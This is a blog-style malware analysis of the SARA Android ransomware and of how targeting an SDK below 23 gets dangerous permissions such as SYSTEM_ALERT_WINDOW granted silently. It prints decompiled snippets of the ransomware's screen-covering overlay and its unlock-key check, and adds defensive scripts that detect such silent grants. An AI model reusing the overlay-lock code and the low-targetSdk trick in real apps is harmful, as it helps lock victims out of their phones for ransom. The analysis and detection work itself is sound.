Fear of the Target SDK, a story of a Ransomware
The main motivation behind this article was a recent (9/2021) Twitter post from @elhackernet about SARA, a.k.a. Simple Android Ransomware Attack. As I am kinda obsessed with malware applications, I downloaded the sample and started digging around.
Here is what I found…
Once upon a time in AndroidLand
There was a time when life was much easier for Android malware developers. Back in the days of Android 5 or earlier (SDK 22), you didn’t have to ask the user’s permission to access their personal info; you just had to declare the appropriate permissions in the manifest and they were magically approved. I know… it sounds obnoxious… but we can’t prevent something if we don’t know the risk behind it. I am sure those Tour de France bicyclists below would agree with me…
Now in AndroidLand?
Now things are much better, as there are more “CAN NOT DO”s than ever; I won’t go through them, as I want to keep this post very short. I just want to draw your attention to the Note below:
What stands out in the statement above is the opening “If” and the missing “else” at the end. To see what I mean, create a simple Android project and add the following statements to the AndroidManifest:
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.READ_CALENDAR"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
Now change the targetSdkVersion in the build.gradle script to something lower than 23:
defaultConfig {
    applicationId "com.demostrating.overlays"
    minSdkVersion 16
    targetSdkVersion 22
    versionCode 1
    versionName "1.0"
    testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
}
Finally, install it on an Android 9 device and inspect the application’s approved permissions:
Notice that although no permission has been requested at runtime, all the ones declared in the AndroidManifest have been approved silently by the system.
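The same check can be done from the command line instead of the Settings screen. The following script is an added example (not code from the article): it parses the text printed by `adb shell dumpsys package <package>` and lists the permissions that were granted at install time even though, had the app targeted SDK 23 or higher, each would have required a user prompt. `SAMPLE_DUMPSYS` is constructed to mirror the shape of that output for the demo app above and was not captured from a real device; the function names are mine.

```python
"""Verify on a device which permissions an installed app received without a prompt.
Added example, not code from the article. Feed the real output of
`adb shell dumpsys package <package>` to parse_dumpsys() to check an installed app."""
import re

RUNTIME_PROMPT_SDK = 23  # targetSdkVersion at which runtime permission prompts begin

# Permissions from the article that need a user prompt (or, for SYSTEM_ALERT_WINDOW,
# a Settings toggle) only when the app targets SDK 23 or higher.
PROMPT_REQUIRED = {
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.READ_CALENDAR",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_SMS",
    "android.permission.CAMERA",
    "android.permission.READ_CONTACTS",
}

# Constructed sample modelled on the shape of `dumpsys package` output for the
# demo app (targetSdk 22); not captured from a real device.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.demostrating.overlays] (1a2b3c4):
    userId=10123
    versionCode=1 minSdk=16 targetSdk=22
    versionName=1.0
    requested permissions:
      android.permission.SYSTEM_ALERT_WINDOW
      android.permission.READ_CALENDAR
      android.permission.READ_SMS
      android.permission.CAMERA
    install permissions:
      android.permission.SYSTEM_ALERT_WINDOW: granted=true
      android.permission.READ_CALENDAR: granted=true
      android.permission.READ_SMS: granted=true
      android.permission.CAMERA: granted=true
    User 0: installed=true hidden=false stopped=true
      runtime permissions:
"""

PERM_STATE = re.compile(r"^([\w.]+): granted=(true|false)")


def parse_dumpsys(text):
    """Extract targetSdk, the install-time grants and the runtime grant states."""
    result = {"target_sdk": None, "install_granted": [], "runtime": {}}
    m = re.search(r"\btargetSdk=(\d+)", text)
    if m:
        result["target_sdk"] = int(m.group(1))
    section = None
    for line in text.splitlines():
        s = line.strip()
        if s.endswith(" permissions:"):
            section = s.split()[0]  # "requested", "install" or "runtime"
            continue
        m = PERM_STATE.match(s)
        if m is None:
            section = None  # any other line ends the current permission list
            continue
        name, granted = m.group(1), m.group(2) == "true"
        if section == "install" and granted:
            result["install_granted"].append(name)
        elif section == "runtime":
            result["runtime"][name] = granted
    return result


def silent_grants(parsed):
    """Install-time grants that would have needed a prompt under targetSdk >= 23.
    Empty when the app already targets 23 or higher."""
    target = parsed["target_sdk"]
    if target is None or target >= RUNTIME_PROMPT_SDK:
        return []
    return sorted(p for p in parsed["install_granted"] if p in PROMPT_REQUIRED)


if __name__ == "__main__":
    parsed = parse_dumpsys(SAMPLE_DUMPSYS)
    print("targetSdk:", parsed["target_sdk"])
    for perm in silent_grants(parsed):
        print("granted without a prompt:", perm)
```

Any line under "install permissions:" with granted=true that belongs to the dangerous or special set is the silent approval the screenshot shows; an app targeting 23 or higher lists those permissions under "runtime permissions:" with granted=false until the user accepts them.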
Where does the ransomware come into the frame?
SARA is indeed a very simple ransomware, where all the malicious activity takes place in the com.termuxhackers.id.MyService class. More specifically:
The app creates an instance of the WindowManager:
this.windowManager = (WindowManager) getSystemService("window");
A view:
this.myView = (ViewGroup) ((LayoutInflater) getSystemService("layout_inflater")).inflate(R.layout.main, (ViewGroup) null);
Some layout parameters, which in short create an overlay that will cover the screen (the 2002 is the window type TYPE_PHONE):
// width/height = -2 (WRAP_CONTENT), type = 2002 (TYPE_PHONE),
// flags = 1 (FLAG_ALLOW_LOCK_WHILE_SCREEN_ON), format = -3 (PixelFormat.TRANSLUCENT)
WindowManager.LayoutParams layoutParams = new WindowManager.LayoutParams(-2, -2, 2002, 1, -3);
It then adds the view using the window manager instance:
this.windowManager.addView(this.myView, layoutParams);
And it asks the user for a key in order to remove the overlay (the “key_pass” value can change):
if (this.this$0.e1.getText().toString().equals("key_pass")) {
    this.this$0.windowManager.removeView(this.this$0.myView);
}
What stands out here, though, is the fact that in order for an app to create a TYPE_PHONE overlay it needs the SYSTEM_ALERT_WINDOW permission. While for SDK versions greater than or equal to 23 the user has to explicitly approve this permission, for lower versions it is approved by default. But guess what… as soon as the developer targets an SDK lower than 23, this permission is automatically approved:
package="com.termuxhackers.id" ... platformBuildVersionName="10">
<uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
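For triaging an APK before it ever reaches a device, the same question can be asked of its manifest. The script below is an added example, not code from the article or from SARA: given a decoded AndroidManifest.xml (the apktool decoding step is not shown), it reports the targetSdkVersion and the dangerous or special permissions that Android would grant at install time without a prompt because the target is below 23. The three sample manifests are constructed from the fragments quoted in the article (the demo project, the same project retargeted to API 30, and SARA’s manifest); `triage_manifest` and the other names are mine.

```python
"""Static triage of a decoded AndroidManifest.xml: flag apps that target an SDK
below 23 while declaring permissions Android then grants without a prompt.
Added example, not code from the article or from SARA."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
RUNTIME_PROMPT_SDK = 23  # targetSdkVersion at which runtime permission prompts begin

# Dangerous permissions from the article (runtime prompt on API 23+) plus the
# special SYSTEM_ALERT_WINDOW overlay permission (Settings toggle on API 23+).
PROMPT_REQUIRED = {
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.READ_CALENDAR",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_SMS",
    "android.permission.CAMERA",
    "android.permission.READ_CONTACTS",
}

# Constructed from the article's demo project (targetSdkVersion 22).
DEMO_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.demostrating.overlays">
    <uses-sdk android:minSdkVersion="16" android:targetSdkVersion="22"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.READ_CALENDAR"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
</manifest>"""

# Same declarations, retargeted to API 30 (the Play requirement from November 2021).
HARDENED_MANIFEST = DEMO_MANIFEST.replace(
    'android:targetSdkVersion="22"', 'android:targetSdkVersion="30"')

# Constructed from the SARA manifest fragment quoted in the article.
SARA_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.termuxhackers.id">
    <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="21"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
</manifest>"""


def attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def effective_target_sdk(root):
    """targetSdkVersion, with the platform's fallbacks: minSdkVersion, else 1."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1
    for key in ("targetSdkVersion", "minSdkVersion"):
        value = attr(uses_sdk, key)
        if value is not None and value.isdigit():
            return int(value)
    return 1


def triage_manifest(xml_text):
    """Return package, effective target SDK, declared permissions and the subset
    that would be granted silently at install time (empty when target >= 23)."""
    root = ET.fromstring(xml_text)
    target = effective_target_sdk(root)
    declared = sorted(attr(e, "name") for e in root.iter("uses-permission")
                      if attr(e, "name"))
    sensitive = [p for p in declared if p in PROMPT_REQUIRED]
    silently = sensitive if target < RUNTIME_PROMPT_SDK else []
    return {
        "package": root.get("package"),
        "target_sdk": target,
        "declared": declared,
        "silently_granted": silently,
        "risky": bool(silently),
    }


if __name__ == "__main__":
    for name, manifest in (("demo", DEMO_MANIFEST), ("hardened", HARDENED_MANIFEST),
                           ("sara", SARA_MANIFEST)):
        report = triage_manifest(manifest)
        print(name, report["package"], "targetSdk", report["target_sdk"],
              "silently granted:", report["silently_granted"])
```

A manifest with no uses-sdk element is treated as targeting SDK 1, which is what the platform does, so a missing element is a finding rather than a pass. The list of permissions is the article’s; extend PROMPT_REQUIRED with the other dangerous permissions if you use this for real triage.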
How to protect
Fortunately, Google doesn’t allow applications that target low SDKs to be uploaded to Google Play, and the minimum API level allowed is raised periodically. For example, starting in November 2021, app updates will be required to target API level 30 or above and adjust for behavioural changes in Android 11.
Additionally, newer Android versions (10 or higher) display a warning about the application’s permissions during installation, but they still approve some special permissions (e.g. SYSTEM_ALERT_WINDOW):
Applications that come from unknown sources, though, still pose a great risk, so next time, think twice…